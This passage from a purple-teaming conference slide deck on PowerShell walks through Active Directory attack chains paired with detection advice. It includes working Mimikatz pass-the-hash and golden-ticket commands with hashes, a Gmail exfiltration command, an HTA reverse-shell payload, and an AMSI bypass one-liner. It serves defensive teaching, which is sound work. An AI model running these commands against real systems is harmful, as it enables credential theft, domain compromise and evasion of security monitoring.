    Purple Team StoryOne • Dump credentials using the local admin access Nikhil Mittal 22PowerShell for Practical Purple Teaming
  • 23.
    Purple Team StoryOne • Look for Domain Admin Privileges – We can search the domain for machines where a Domain Admin (DA) token is available. – PowerView Invoke-UserHunter –Verbose Nikhil Mittal 23PowerShell for Practical Purple Teaming
  • 24.
    Purple Team StoryOne • Look for Domain Admin Privileges – Logs - Event 4624 (Successful Logon) and 4634 (Logoff) on all tested machines and Event 4672 (Admin Logon) on success Nikhil Mittal 24PowerShell for Practical Purple Teaming
  • 25.
    Purple Team StoryOne • Look for Domain Admin Privileges – Detection with Microsoft ATA (Recon using SMB Session Enumeration) Nikhil Mittal 25PowerShell for Practical Purple Teaming
  • 26.
    Purple Team StoryOne • Get DA Access Invoke-Mimikatz -ComputerName ops- file Invoke-Mimikatz -Command '"sekurlsa::pth /user:privservice /domain:offensiveps.com /ntlm:7851d4a63e8a624dfee39616c3774 c83 /run:powershell.exe"' Nikhil Mittal 26PowerShell for Practical Purple Teaming
  • 27.
    Purple Team StoryOne • Get DA Access Nikhil Mittal 27PowerShell for Practical Purple Teaming
  • 28.
    Purple Team StoryOne • Create Golden Ticket Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername ops-dc Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:offensiveps.com /sid:/sid:S-1- 5-21-325-3177237293-604223748 /krbtgt:5c1a7d30a872cac2b7a32e7857589d 97 /id:500 /groups:513 /ticket:krb_tkt.txt"' Nikhil Mittal 28PowerShell for Practical Purple Teaming
  • 29.
    Purple Team StoryOne • Use Golden Ticket Invoke-Mimikatz -Command '"kerberos::ptt C:UserslabuserDesktopkrb_tkt.tx t'" – Same logs as for other lateral movement activities. – ATA detects Golden Ticket Nikhil Mittal 29PowerShell for Practical Purple Teaming
  • 30.
    Purple Team StoryOne • Use Golden Ticket – ATA detects Golden Ticket Nikhil Mittal 30PowerShell for Practical Purple Teaming
  • 31.
    Purple Team StoryOne • Exfiltration – Exfiltration of key components using Gmail (Below script from Nishang) Do-Exfiltration -Data "5c1a7d30a872cac2b7a32e7857589d97" -ExfilOption gmail -username psgcatlite -password powershellchabi9988 – Detection – HTTPS Interception Nikhil Mittal 31PowerShell for Practical Purple Teaming
  • 32.
    Purple Team StoryOne • Exfiltration – Exfiltration of huge chunks of data – Gmail (Google Drive?), Pastebin, Github, DropBox – Detection – HTTPS Interception Nikhil Mittal 32PowerShell for Practical Purple Teaming
  • 33.
    Purple Team StoryTwo • Start as a non-localadmin domain user - Client Side Attack when powershell.exe blocked with whitelisting • Use a ICMP/HTTPS shell? • Exfiltration Nikhil Mittal 33PowerShell for Practical Purple Teaming
  • 34.
    Purple Team StoryTwo • Start as a normal non-localadmin domain user – Client Side Attack (powershell.exe blocked) – Check for multiple file extensions. HTA is my favorite. Nishang has a script for that Out-HTA -PayloadScript .Invoke- PowerShellTcpOneLine.ps1 Nikhil Mittal 34PowerShell for Practical Purple Teaming
  • 35.
    Purple Team StoryTwo • Start as a normal non-local admin domain user – Process creation logs (Event 4688) – Applocker logs (Event 8002 – allowed - is logged for PowerShell when it is blocked and executed by something like mshta.exe) – PowerShell transcripts will log everything as well. In fact, even when using msbuild, transcript logs things. Nikhil Mittal 35PowerShell for Practical Purple Teaming
  • 36.
    Purple Team StoryTwo • Start as a normal non-localadmin domain user – In case, ICMP/HTTPS/DNS (nishang) shells are used, detection at the network level becomes a bit harder. Make sure that these protocols are monitored as well. – Recommended read for DNS https://blogs.technet.microsoft.com/office365 security/dns-intrusion-detection-in-office- 365/ Nikhil Mittal 36PowerShell for Practical Purple Teaming
  • 37.
    Random Powershell • PowerShellv2 does not offer enhanced logging and detection (AMSI) capabilities. Using v2 (executable or reference assemblies) for attacks is very useful. • Simply running PowerShell with –version parameter or C# executable with reference to older assemblies can be used powershell.exe –version 2 Nikhil Mittal 37PowerShell for Practical Purple Teaming
  • 38.
    Random Powershell • WindowsPowerShell log Event Id 400 contains Engine version which can be used for detection. Reference:http://www.leeholmes.com/blog/2017/03/17/detect ing-and-preventing-powershell-downgrade-attacks/ Nikhil Mittal 38PowerShell for Practical Purple Teaming
  • 39.
    Random Powershell • Ifpowershell.exe is blocked. .Net code can use System.Management.Automation NameSpace to load Powershell functionality. C:WindowsMicrosoft.NETFramew orkv4.0.30319>msbuild.exe pshell.xml Nikhil Mittal 39PowerShell for Practical Purple Teaming
  • 40.
    Random Powershell • Systemwide transcript logs usage of the namespace Nikhil Mittal 40PowerShell for Practical Purple Teaming
  • 41.
    Random Powershell • IfPowerShell v5 is installed. AMSI can help in detection of scripts like PowerShell, VB, JScript from memory. • Even if you load the scripts completely from memory (download cradle, encodedcommand etc.) Nikhil Mittal 41PowerShell for Practical Purple Teaming
  • 42.
    Random Powershell • AMSIcan be unloaded using methods like: amsi.dll hijack (p0wnedshell) [Ref].Assembly.GetType('System.Management .Automation.AmsiUtils').GetField('amsiIni tFailed','NonPublic,Static').SetValue($nu ll,$true) - by Matt Graeber - Event ID 4104 (Microsoft-Windows-PowerShell/Operational) – Suspicious script block logging Nikhil Mittal 42PowerShell for Practical Purple Teaming
  • 43.
    Purple Team withexternal red team • Most Purple team models suggest an internal red team, for some very valid reasons – like adversarial approach and not sharing techniques. • But, external red component of a Purple team brings new perspective, techniques and methodologies. You just need right team structure and terms. Nikhil Mittal 43PowerShell for Practical Purple Teaming
  • 44.
    Resources/References • Chris Gates– Going Purple http://carnal0wnage.attackresearch.com/2016/01/purple- teaming-lessons-learned-ruxcon.html • Chris Gates and Haydn Johnson https://www.slideshare.net/chrisgates/purple-teaming-the- cyber-kill-chain-practical-exercises-for-everyone-sector-2016 • Jorge Orchilles https://tacticaledge.co/presos/Jorge%20Orchilles%20- %20Purple%20Team%20- %20Evolving%20Red%20vs%20Blue%20- %20Tactical%20Edge.pdf Nikhil Mittal 44PowerShell for Practical Purple Teaming
  • 45.
    Conclusion • Purple teamaims to bring Red and Blue together to maximize the benefits of threat simulation. • It doesn’t mean an end to red teaming – both have different goals. • Structural and work culture changes required to create an effective purple team. Nikhil Mittal 45PowerShell for Practical Purple Teaming
  • 46.
    Thank You • Thanksx33fcon! • Please provide feedback. • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 46Nikhil Mittal PowerShell for Practical Purple Teaming